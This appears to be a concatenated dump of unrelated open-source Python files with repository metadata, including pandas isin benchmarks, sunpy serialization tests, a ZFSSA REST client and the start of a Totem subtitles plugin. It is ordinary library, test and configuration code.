self.in_degree = in_degree
self.out_degree = out_degree
self.status = status
self.d_time = d_time
self.f_time = f_time
self.parent = parent
self.prioity = prioity
@staticmethod
def init_priority():
return 65532
class Edge(object):
def __init__(self, data, weight, type='UNDETERMINED'):
self.data = data
self.weight = weight
self.type = type
|
haoliangyu/basic-data-structure
|
GraphElement.py
|
Python
|
mit
| 639
|
import numpy as np
from pandas import (
Categorical,
Index,
NaT,
Series,
date_range,
)
from ..pandas_vb_common import tm
class IsIn:
params = [
"int64",
"uint64",
"object",
"Int64",
"boolean",
"bool",
"datetime64[ns]",
"category[object]",
"category[int]",
"str",
"string[python]",
"string[pyarrow]",
]
param_names = ["dtype"]
def setup(self, dtype):
N = 10000
self.mismatched = [NaT.to_datetime64()] * 2
if dtype in ["boolean", "bool"]:
self.series = Series(np.random.randint(0, 2, N)).astype(dtype)
self.values = [True, False]
elif dtype == "datetime64[ns]":
# Note: values here is much larger than non-dt64ns cases
# dti has length=115777
dti = date_range(start="2015-10-26", end="2016-01-01", freq="50s")
self.series = Series(dti)
self.values = self.series._values[::3]
self.mismatched = [1, 2]
elif dtype in ["category[object]", "category[int]"]:
# Note: sizes are different in this case than others
n = 5 * 10**5
sample_size = 100
arr = list(np.random.randint(0, n // 10, size=n))
if dtype == "category[object]":
arr = [f"s{i:04d}" for i in arr]
self.values = np.random.choice(arr, sample_size)
self.series = Series(arr).astype("category")
elif dtype in ["str", "string[python]", "string[pyarrow]"]:
try:
self.series = Series(tm.makeStringIndex(N), dtype=dtype)
except ImportError:
raise NotImplementedError
self.values = list(self.series[:2])
else:
self.series = Series(np.random.randint(1, 10, N)).astype(dtype)
self.values = [1, 2]
self.cat_values = Categorical(self.values)
def time_isin(self, dtype):
self.series.isin(self.values)
def time_isin_categorical(self, dtype):
self.series.isin(self.cat_values)
def time_isin_empty(self, dtype):
self.series.isin([])
def time_isin_mismatched_dtype(self, dtype):
self.series.isin(self.mismatched)
class IsinAlmostFullWithRandomInt:
params = [
[np.float64, np.int64, np.uint64, np.object_],
range(10, 21),
["inside", "outside"],
]
param_names = ["dtype", "exponent", "title"]
def setup(self, dtype, exponent, title):
M = 3 * 2 ** (exponent - 2)
# 0.77-the maximal share of occupied buckets
self.series = Series(np.random.randint(0, M, M)).astype(dtype)
values = np.random.randint(0, M, M).astype(dtype)
if title == "inside":
self.values = values
elif title == "outside":
self.values = values + M
else:
raise ValueError(title)
def time_isin(self, dtype, exponent, title):
self.series.isin(self.values)
class IsinWithRandomFloat:
params = [
[np.float64, np.object_],
[
1_300,
2_000,
7_000,
8_000,
70_000,
80_000,
750_000,
900_000,
],
["inside", "outside"],
]
param_names = ["dtype", "size", "title"]
def setup(self, dtype, size, title):
self.values = np.random.rand(size)
self.series = Series(self.values).astype(dtype)
np.random.shuffle(self.values)
if title == "outside":
self.values = self.values + 0.1
def time_isin(self, dtype, size, title):
self.series.isin(self.values)
class IsinWithArangeSorted:
params = [
[np.float64, np.int64, np.uint64, np.object_],
[
1_000,
2_000,
8_000,
100_000,
1_000_000,
],
]
param_names = ["dtype", "size"]
def setup(self, dtype, size):
self.series = Series(np.arange(size)).astype(dtype)
self.values = np.arange(size).astype(dtype)
def time_isin(self, dtype, size):
self.series.isin(self.values)
class IsinWithArange:
params = [
[np.float64, np.int64, np.uint64, np.object_],
[
1_000,
2_000,
8_000,
],
[-2, 0, 2],
]
param_names = ["dtype", "M", "offset_factor"]
def setup(self, dtype, M, offset_factor):
offset = int(M * offset_factor)
tmp = Series(np.random.randint(offset, M + offset, 10**6))
self.series = tmp.astype(dtype)
self.values = np.arange(M).astype(dtype)
def time_isin(self, dtype, M, offset_factor):
self.series.isin(self.values)
class IsInFloat64:
params = [
[np.float64, "Float64"],
["many_different_values", "few_different_values", "only_nans_values"],
]
param_names = ["dtype", "title"]
def setup(self, dtype, title):
N_many = 10**5
N_few = 10**6
self.series = Series([1, 2], dtype=dtype)
if title == "many_different_values":
# runtime is dominated by creation of the lookup-table
self.values = np.arange(N_many, dtype=np.float64)
elif title == "few_different_values":
# runtime is dominated by creation of the lookup-table
self.values = np.zeros(N_few, dtype=np.float64)
elif title == "only_nans_values":
# runtime is dominated by creation of the lookup-table
self.values = np.full(N_few, np.nan, dtype=np.float64)
else:
raise ValueError(title)
def time_isin(self, dtype, title):
self.series.isin(self.values)
class IsInForObjects:
"""
A subset of the cartesian product of cases have special motivations:
"nans" x "nans"
if nan-objects are different objects,
this has the potential to trigger O(n^2) running time
"short" x "long"
running time dominated by the preprocessing
"long" x "short"
running time dominated by look-up
"long" x "long"
no dominating part
"long_floats" x "long_floats"
because of nans floats are special
no dominating part
"""
variants = ["nans", "short", "long", "long_floats"]
params = [variants, variants]
param_names = ["series_type", "vals_type"]
def setup(self, series_type, vals_type):
N_many = 10**5
if series_type == "nans":
ser_vals = np.full(10**4, np.nan)
elif series_type == "short":
ser_vals = np.arange(2)
elif series_type == "long":
ser_vals = np.arange(N_many)
elif series_type == "long_floats":
ser_vals = np.arange(N_many, dtype=np.float_)
self.series = Series(ser_vals).astype(object)
if vals_type == "nans":
values = np.full(10**4, np.nan)
elif vals_type == "short":
values = np.arange(2)
elif vals_type == "long":
values = np.arange(N_many)
elif vals_type == "long_floats":
values = np.arange(N_many, dtype=np.float_)
self.values = values.astype(object)
def time_isin(self, series_type, vals_type):
self.series.isin(self.values)
class IsInLongSeriesLookUpDominates:
params = [
["int64", "int32", "float64", "float32", "object", "Int64", "Float64"],
[5, 1000],
["random_hits", "random_misses", "monotone_hits", "monotone_misses"],
]
param_names = ["dtype", "MaxNumber", "series_type"]
def setup(self, dtype, MaxNumber, series_type):
N = 10**7
if series_type == "random_hits":
array = np.random.randint(0, MaxNumber, N)
if series_type == "random_misses":
array = np.random.randint(0, MaxNumber, N) + MaxNumber
if series_type == "monotone_hits":
array = np.repeat(np.arange(MaxNumber), N // MaxNumber)
if series_type == "monotone_misses":
array = np.arange(N) + MaxNumber
self.series = Series(array).astype(dtype)
self.values = np.arange(MaxNumber).astype(dtype.lower())
def time_isin(self, dtypes, MaxNumber, series_type):
self.series.isin(self.values)
class IsInLongSeriesValuesDominate:
params = [
["int64", "int32", "float64", "float32", "object", "Int64", "Float64"],
["random", "monotone"],
]
param_names = ["dtype", "series_type"]
def setup(self, dtype, series_type):
N = 10**7
if series_type == "random":
vals = np.random.randint(0, 10 * N, N)
if series_type == "monotone":
vals = np.arange(N)
self.values = vals.astype(dtype.lower())
M = 10**6 + 1
self.series = Series(np.arange(M)).astype(dtype)
def time_isin(self, dtypes, series_type):
self.series.isin(self.values)
class IsInWithLongTupples:
def setup(self):
t = tuple(range(1000))
self.series = Series([t] * 1000)
self.values = [t]
def time_isin(self):
self.series.isin(self.values)
class IsInIndexes:
def setup(self):
self.range_idx = Index(range(1000))
self.index = Index(list(range(1000)))
self.series = Series(np.random.randint(100_000, size=1000))
def time_isin_range_index(self):
self.series.isin(self.range_idx)
def time_isin_index(self):
self.series.isin(self.index)
|
pandas-dev/pandas
|
asv_bench/benchmarks/algos/isin.py
|
Python
|
bsd-3-clause
| 9,544
|
#!/usr/bin/python
#
# Copyright 2002-2019 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
PyCOMPSs Dummy API - OmpSs
==========================
This file contains the dummy class OmpSs used as decorator.
"""
class OmpSs(object):
"""
Dummy constraint class (decorator style)
"""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def __call__(self, f):
def wrapped_f(*args, **kwargs):
return f(*args, **kwargs)
return wrapped_f
ompss = OmpSs
|
mF2C/COMPSs
|
compss/programming_model/bindings/python/src/pycompss/api/dummy/ompss.py
|
Python
|
apache-2.0
| 1,125
|
# -*- coding: utf-8 -*-
#
# Freemix documentation build configuration file, created by
# sphinx-quickstart on Wed Mar 24 11:38:38 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Freemix'
copyright = u'2010, Zepheira, LLC'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import freemix
version = '1.3.4'
# The full version, including alpha/beta/rc tags.
release = freemix.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Freemixdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Freemix.tex', u'Freemix Documentation',
u'Zepheira, LLC', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
|
zepheira/freemix
|
docs/conf.py
|
Python
|
apache-2.0
| 6,571
|
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import urllib
from oslo_config import cfg
from jacket.tests.compute.functional.api_sample_tests import api_sample_base
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'compute.api.openstack.compute.legacy_v2.extensions')
class InstanceUsageAuditLogJsonTest(api_sample_base.ApiSampleTestBaseV21):
ADMIN_API = True
extension_name = "os-instance-usage-audit-log"
def _get_flags(self):
f = super(InstanceUsageAuditLogJsonTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append('compute.api.openstack.compute.'
'contrib.instance_usage_audit_log.'
'Instance_usage_audit_log')
return f
def test_show_instance_usage_audit_log(self):
response = self._do_get('os-instance_usage_audit_log/%s' %
urllib.quote('2012-07-05 10:00:00'))
self._verify_response('inst-usage-audit-log-show-get-resp',
{}, response, 200)
def test_index_instance_usage_audit_log(self):
response = self._do_get('os-instance_usage_audit_log')
self._verify_response('inst-usage-audit-log-index-get-resp',
{}, response, 200)
|
HybridF5/jacket
|
jacket/tests/compute/functional/api_sample_tests/test_instance_usage_audit_log.py
|
Python
|
apache-2.0
| 1,937
|
import json
from astropy import units as u
from sunpy.net import vso
from sunpy.database import attrs as db_attrs
from sunpy.database.serialize import QueryEncoder, query_decode
def test_vso_wave():
attr = vso.attrs.Wave(100 * u.AA, 200 * u.AA)
expected = '{"Wave": [100.0, 200.0, "Angstrom"]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_vso_time():
attr = vso.attrs.Time((1999, 12, 31), (2000, 1, 1))
expected = '{"Time": ["1999-12-31 00:00:00", "2000-01-01 00:00:00", null]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_vso_simple_attr():
attr = vso.attrs.Instrument('EIT')
expected = '{"Instrument": "EIT"}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_starred():
expected = '{"Starred": true}'
assert json.dumps(db_attrs.Starred(), cls=QueryEncoder) == expected
def test_starred_inverted():
expected = '{"Starred": false}'
assert json.dumps(~db_attrs.Starred(), cls=QueryEncoder) == expected
def test_tag():
expected = '{"Tag": ["foo", false]}'
assert json.dumps(db_attrs.Tag('foo'), cls=QueryEncoder) == expected
def test_tag_inverted():
expected = '{"Tag": ["foo", true]}'
assert json.dumps(~db_attrs.Tag('foo'), cls=QueryEncoder) == expected
def test_path():
expected = '{"Path": ["bar", false]}'
assert json.dumps(db_attrs.Path('bar'), cls=QueryEncoder) == expected
def test_path_inverted():
expected = '{"Path": ["bar", true]}'
assert json.dumps(~db_attrs.Path('bar'), cls=QueryEncoder) == expected
def test_download_time():
attr = db_attrs.DownloadTime((1991, 8, 25, 3, 15, 40), (2001, 3, 5))
expected = (
'{"DownloadTime": '
'["1991-08-25 03:15:40", "2001-03-05 00:00:00", false]}')
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_download_time_inverted():
attr = ~db_attrs.DownloadTime((1991, 8, 25, 3, 15, 40), (2001, 3, 5))
expected = (
'{"DownloadTime": '
'["1991-08-25 03:15:40", "2001-03-05 00:00:00", true]}')
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_fits_header_entry():
attr = db_attrs.FitsHeaderEntry('key', 'value')
expected = '{"FitsHeaderEntry": ["key", "value", false]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_fits_header_entry_inverted():
attr = ~db_attrs.FitsHeaderEntry('key', 'value')
expected = '{"FitsHeaderEntry": ["key", "value", true]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_attr_or():
attr = vso.attrs.Source('SOHO') | vso.attrs.Provider('SDAC')
expected = '{"AttrOr": [{"Provider": "SDAC"}, {"Source": "SOHO"}]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_attr_and():
attr = vso.attrs.Source('SOHO') & vso.attrs.Provider('SDAC')
expected = '{"AttrAnd": [{"Provider": "SDAC"}, {"Source": "SOHO"}]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_decode_wave():
dump = '{"Wave": [10.0, 20.0, "Angstrom"]}'
assert json.loads(dump, object_hook=query_decode) == vso.attrs.Wave(10 * u.AA, 20 * u.AA)
def test_decode_time():
dump = '{"Time": ["1999-12-31 00:00:00", "2000-01-01 00:00:00", null]}'
expected = vso.attrs.Time((1999, 12, 31), (2000, 1, 1))
assert json.loads(dump, object_hook=query_decode) == expected
def test_decode_simple_attr():
dump = '{"Instrument": "EIT"}'
expected = vso.attrs.Instrument('EIT')
assert json.loads(dump, object_hook=query_decode) == expected
def test_decode_starred():
dump = '{"Starred": false}'
assert json.loads(dump, object_hook=query_decode) == db_attrs.Starred()
def test_decode_starred_inverted():
dump = '{"Starred": true}'
assert json.loads(dump, object_hook=query_decode) == ~db_attrs.Starred()
def test_decode_tag():
dump = '{"Tag": ["foo", false]}'
assert json.loads(dump, object_hook=query_decode) == db_attrs.Tag('foo')
def test_decode_path():
dump = '{"Path": ["bar", false]}'
assert json.loads(dump, object_hook=query_decode) == db_attrs.Path('bar')
def test_decode_download_time():
dump = (
'{"DownloadTime": '
'["1991-08-25 03:15:40", "2001-03-05 00:00:00", true]}')
expected = ~db_attrs.DownloadTime((1991, 8, 25, 3, 15, 40), (2001, 3, 5))
assert json.loads(dump, object_hook=query_decode) == expected
def test_decode_fits_header_entry():
dump = '{"FitsHeaderEntry": ["key", "value", false]}'
expected = db_attrs.FitsHeaderEntry('key', 'value')
assert json.loads(dump, object_hook=query_decode) == expected
def test_decode_or():
dump = '{"AttrOr": [{"Source": "SOHO"}, {"Provider": "SDAC"}]}'
expected = vso.attrs.Source('SOHO') | vso.attrs.Provider('SDAC')
assert json.loads(dump, object_hook=query_decode) == expected
def test_decode_and():
dump = '{"AttrAnd": [{"Source": "SOHO"}, {"Provider": "SDAC"}]}'
expected = vso.attrs.Source('SOHO') & vso.attrs.Provider('SDAC')
assert json.loads(dump, object_hook=query_decode) == expected
|
Alex-Ian-Hamilton/sunpy
|
sunpy/database/tests/test_serialize.py
|
Python
|
bsd-2-clause
| 5,068
|
# Copyright (c) 2014, Oracle and/or its affiliates. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
ZFS Storage Appliance REST API Client Programmatic Interface
TODO(diemtran): this module needs to be placed in a library common to OpenStack
services. When this happens, the file should be removed from Manila code
base and imported from the relevant library.
"""
import time
from oslo_serialization import jsonutils
import six
from six.moves import http_client
# pylint: disable=E0611,F0401
from six.moves.urllib import error as urlerror
from six.moves.urllib import request as urlrequest
def log_debug_msg(obj, message):
if obj.log_function:
obj.log_function(message)
class Status(object):
"""Result HTTP Status."""
#: Request return OK
OK = http_client.OK # pylint: disable=invalid-name
#: New resource created successfully
CREATED = http_client.CREATED
#: Command accepted
ACCEPTED = http_client.ACCEPTED
#: Command returned OK but no data will be returned
NO_CONTENT = http_client.NO_CONTENT
#: Bad Request
BAD_REQUEST = http_client.BAD_REQUEST
#: User is not authorized
UNAUTHORIZED = http_client.UNAUTHORIZED
#: The request is not allowed
FORBIDDEN = http_client.FORBIDDEN
#: The requested resource was not found
NOT_FOUND = http_client.NOT_FOUND
#: The request is not allowed
NOT_ALLOWED = http_client.METHOD_NOT_ALLOWED
#: Request timed out
TIMEOUT = http_client.REQUEST_TIMEOUT
#: Invalid request
CONFLICT = http_client.CONFLICT
#: Service Unavailable
BUSY = http_client.SERVICE_UNAVAILABLE
class RestResult(object):
"""Result from a REST API operation."""
def __init__(self, logfunc=None, response=None, err=None):
"""Initialize a RestResult containing the results from a REST call.
:param logfunc: debug log function.
:param response: HTTP response.
:param err: HTTP error.
"""
self.response = response
self.log_function = logfunc
self.error = err
self.data = ""
self.status = 0
if self.response:
self.status = self.response.getcode()
result = self.response.read()
while result:
self.data += result
result = self.response.read()
if self.error:
self.status = self.error.code
self.data = http_client.responses[self.status]
log_debug_msg(self, 'Response code: %s' % self.status)
log_debug_msg(self, 'Response data: %s' % self.data)
def get_header(self, name):
"""Get an HTTP header with the given name from the results.
:param name: HTTP header name.
:return: The header value or None if no value is found.
"""
if self.response is None:
return None
info = self.response.info()
return info.getheader(name)
class RestClientError(Exception):
"""Exception for ZFS REST API client errors."""
def __init__(self, status, name="ERR_INTERNAL", message=None):
"""Create a REST Response exception.
:param status: HTTP response status.
:param name: The name of the REST API error type.
:param message: Descriptive error message returned from REST call.
"""
super(RestClientError, self).__init__(message)
self.code = status
self.name = name
self.msg = message
if status in http_client.responses:
self.msg = http_client.responses[status]
def __str__(self):
return "%d %s %s" % (self.code, self.name, self.msg)
class RestClientURL(object): # pylint: disable=R0902
"""ZFSSA urllib client."""
def __init__(self, url, logfunc=None, **kwargs):
"""Initialize a REST client.
:param url: The ZFSSA REST API URL.
:key session: HTTP Cookie value of x-auth-session obtained from a
normal BUI login.
:key timeout: Time in seconds to wait for command to complete.
(Default is 60 seconds).
"""
self.url = url
self.log_function = logfunc
self.local = kwargs.get("local", False)
self.base_path = kwargs.get("base_path", "/api")
self.timeout = kwargs.get("timeout", 60)
self.headers = None
if kwargs.get('session'):
self.headers['x-auth-session'] = kwargs.get('session')
self.headers = {"content-type": "application/json"}
self.do_logout = False
self.auth_str = None
def _path(self, path, base_path=None):
"""Build rest url path."""
if path.startswith("http://") or path.startswith("https://"):
return path
if base_path is None:
base_path = self.base_path
if not path.startswith(base_path) and not (
self.local and ("/api" + path).startswith(base_path)):
path = "%s%s" % (base_path, path)
if self.local and path.startswith("/api"):
path = path[4:]
return self.url + path
def _authorize(self):
"""Performs authorization setting x-auth-session."""
self.headers['authorization'] = 'Basic %s' % self.auth_str
if 'x-auth-session' in self.headers:
del self.headers['x-auth-session']
try:
result = self.post("/access/v1")
del self.headers['authorization']
if result.status == http_client.CREATED:
self.headers['x-auth-session'] = \
result.get_header('x-auth-session')
self.do_logout = True
log_debug_msg(self, ('ZFSSA version: %s')
% result.get_header('x-zfssa-version'))
elif result.status == http_client.NOT_FOUND:
raise RestClientError(result.status, name="ERR_RESTError",
message=("REST Not Available:"
"Please Upgrade"))
except RestClientError:
del self.headers['authorization']
raise
def login(self, auth_str):
"""Login to an appliance using a user name and password.
Start a session like what is done logging into the BUI. This is not a
requirement to run REST commands, since the protocol is stateless.
What is does is set up a cookie session so that some server side
caching can be done. If login is used remember to call logout when
finished.
:param auth_str: Authorization string (base64).
"""
self.auth_str = auth_str
self._authorize()
def logout(self):
"""Logout of an appliance."""
result = None
try:
result = self.delete("/access/v1", base_path="/api")
except RestClientError:
pass
self.headers.clear()
self.do_logout = False
return result
def islogin(self):
"""return if client is login."""
return self.do_logout
@staticmethod
def mkpath(*args, **kwargs):
"""Make a path?query string for making a REST request.
:cmd_params args: The path part.
:cmd_params kwargs: The query part.
"""
buf = six.StringIO()
query = "?"
for arg in args:
buf.write("/")
buf.write(arg)
for k in kwargs:
buf.write(query)
if query == "?":
query = "&"
buf.write(k)
buf.write("=")
buf.write(kwargs[k])
return buf.getvalue()
# pylint: disable=R0912
def request(self, path, request, body=None, **kwargs):
"""Make an HTTP request and return the results.
:param path: Path used with the initialized URL to make a request.
:param request: HTTP request type (GET, POST, PUT, DELETE).
:param body: HTTP body of request.
:key accept: Set HTTP 'Accept' header with this value.
:key base_path: Override the base_path for this request.
:key content: Set HTTP 'Content-Type' header with this value.
"""
out_hdrs = dict.copy(self.headers)
if kwargs.get("accept"):
out_hdrs['accept'] = kwargs.get("accept")
if body:
if isinstance(body, dict):
body = six.text_type(jsonutils.dumps(body))
if body and len(body):
out_hdrs['content-length'] = len(body)
zfssaurl = self._path(path, kwargs.get("base_path"))
req = urlrequest.Request(zfssaurl, body, out_hdrs)
req.get_method = lambda: request
maxreqretries = kwargs.get("maxreqretries", 10)
retry = 0
response = None
log_debug_msg(self, 'Request: %s %s' % (request, zfssaurl))
log_debug_msg(self, 'Out headers: %s' % out_hdrs)
if body and body != '':
log_debug_msg(self, 'Body: %s' % body)
while retry < maxreqretries:
try:
response = urlrequest.urlopen(req, timeout=self.timeout)
except urlerror.HTTPError as err:
if err.code == http_client.NOT_FOUND:
log_debug_msg(self, 'REST Not Found: %s' % err.code)
else:
log_debug_msg(self, ('REST Not Available: %s') % err.code)
if (err.code == http_client.SERVICE_UNAVAILABLE and
retry < maxreqretries):
retry += 1
time.sleep(1)
log_debug_msg(self, ('Server Busy retry request: %s')
% retry)
continue
if ((err.code == http_client.UNAUTHORIZED or
err.code == http_client.INTERNAL_SERVER_ERROR) and
'/access/v1' not in zfssaurl):
try:
log_debug_msg(self, ('Authorizing request: '
'%(zfssaurl)s'
'retry: %(retry)d .')
% {'zfssaurl': zfssaurl,
'retry': retry})
self._authorize()
req.add_header('x-auth-session',
self.headers['x-auth-session'])
except RestClientError:
log_debug_msg(self, ('Cannot authorize.'))
retry += 1
time.sleep(1)
continue
return RestResult(self.log_function, err=err)
except urlerror.URLError as err:
log_debug_msg(self, ('URLError: %s') % err.reason)
raise RestClientError(-1, name="ERR_URLError",
message=err.reason)
break
if ((response and
response.getcode() == http_client.SERVICE_UNAVAILABLE) and
retry >= maxreqretries):
raise RestClientError(response.getcode(), name="ERR_HTTPError",
message="REST Not Available: Disabled")
return RestResult(self.log_function, response=response)
def get(self, path, **kwargs):
"""Make an HTTP GET request.
:param path: Path to resource.
"""
return self.request(path, "GET", **kwargs)
def post(self, path, body="", **kwargs):
"""Make an HTTP POST request.
:param path: Path to resource.
:param body: Post data content.
"""
return self.request(path, "POST", body, **kwargs)
def put(self, path, body="", **kwargs):
"""Make an HTTP PUT request.
:param path: Path to resource.
:param body: Put data content.
"""
return self.request(path, "PUT", body, **kwargs)
def delete(self, path, **kwargs):
"""Make an HTTP DELETE request.
:param path: Path to resource that will be deleted.
"""
return self.request(path, "DELETE", **kwargs)
def head(self, path, **kwargs):
"""Make an HTTP HEAD request.
:param path: Path to resource.
"""
return self.request(path, "HEAD", **kwargs)
|
NetApp/manila
|
manila/share/drivers/zfssa/restclient.py
|
Python
|
apache-2.0
| 12,868
|
# -*- coding: utf-8 -*-
import gi
gi.require_version('Peas', '1.0')
gi.require_version('Gtk', '3.0')
gi.require_version('Totem', '1.0')
from gi.repository import GLib, GObject # pylint: disable-msg=E0611
from gi.repository import Peas, Gtk, Gdk # pylint: disable-msg=E0611
from gi.repository import Gio, Pango, Totem # pylint: disable-msg=E0611
import xmlrpc.client
import threading
import zlib
from os import sep, path, mkdir
import gettext
from hash import hash_file
gettext.textdomain ("totem")
D_ = gettext.dgettext
_ = gettext.gettext
USER_AGENT = 'Totem'
OK200 = '200 OK'
TOTEM_REMOTE_COMMAND_REPLACE = 14
SUBTITLES_EXT = [
"asc",
"txt",
"sub",
"srt",
"smi",
"ssa",
"ass",
]
# Map of the language codes used by opensubtitles.org's API to their
# human-readable name
LANGUAGES_STR = [ (D_('iso_639_3', 'Albanian'), 'sq'),
(D_('iso_639_3', 'Arabic'), 'ar'),
(D_('iso_639_3', 'Armenian'), 'hy'),
(D_('iso_639_3', 'Neo-Aramaic, Assyrian'), 'ay'),
(D_('iso_639_3', 'Basque'), 'eu'),
(D_('iso_639_3', 'Bosnian'), 'bs'),
(_('Brazilian Portuguese'), 'pb'),
(D_('iso_639_3', 'Bulgarian'), 'bg'),
(D_('iso_639_3', 'Catalan'), 'ca'),
(D_('iso_639_3', 'Chinese'), 'zh'),
(D_('iso_639_3', 'Croatian'), 'hr'),
(D_('iso_639_3', 'Czech'), 'cs'),
(D_('iso_639_3', 'Danish'), 'da'),
(D_('iso_639_3', 'Dutch'), 'nl'),
(D_('iso_639_3', 'English'), 'en'),
(D_('iso_639_3', 'Esperanto'), 'eo'),
(D_('iso_639_3', 'Estonian'), 'et'),
(D_('iso_639_3', 'Finnish'), 'fi'),
(D_('iso_639_3', 'French'), 'fr'),
(D_('iso_639_3', 'Galician'), 'gl'),
(D_('iso_639_3', 'Georgian'), 'ka'),
(D_('iso_639_3', 'German'), 'de'),
(D_('iso_639_3', 'Greek, Modern (1453-)'), 'el'),
(D_('iso_639_3', 'Hebrew'), 'he'),
(D_('iso_639_3', 'Hindi'), 'hi'),
(D_('iso_639_3', 'Hungarian'), 'hu'),
(D_('iso_639_3', 'Icelandic'), 'is'),
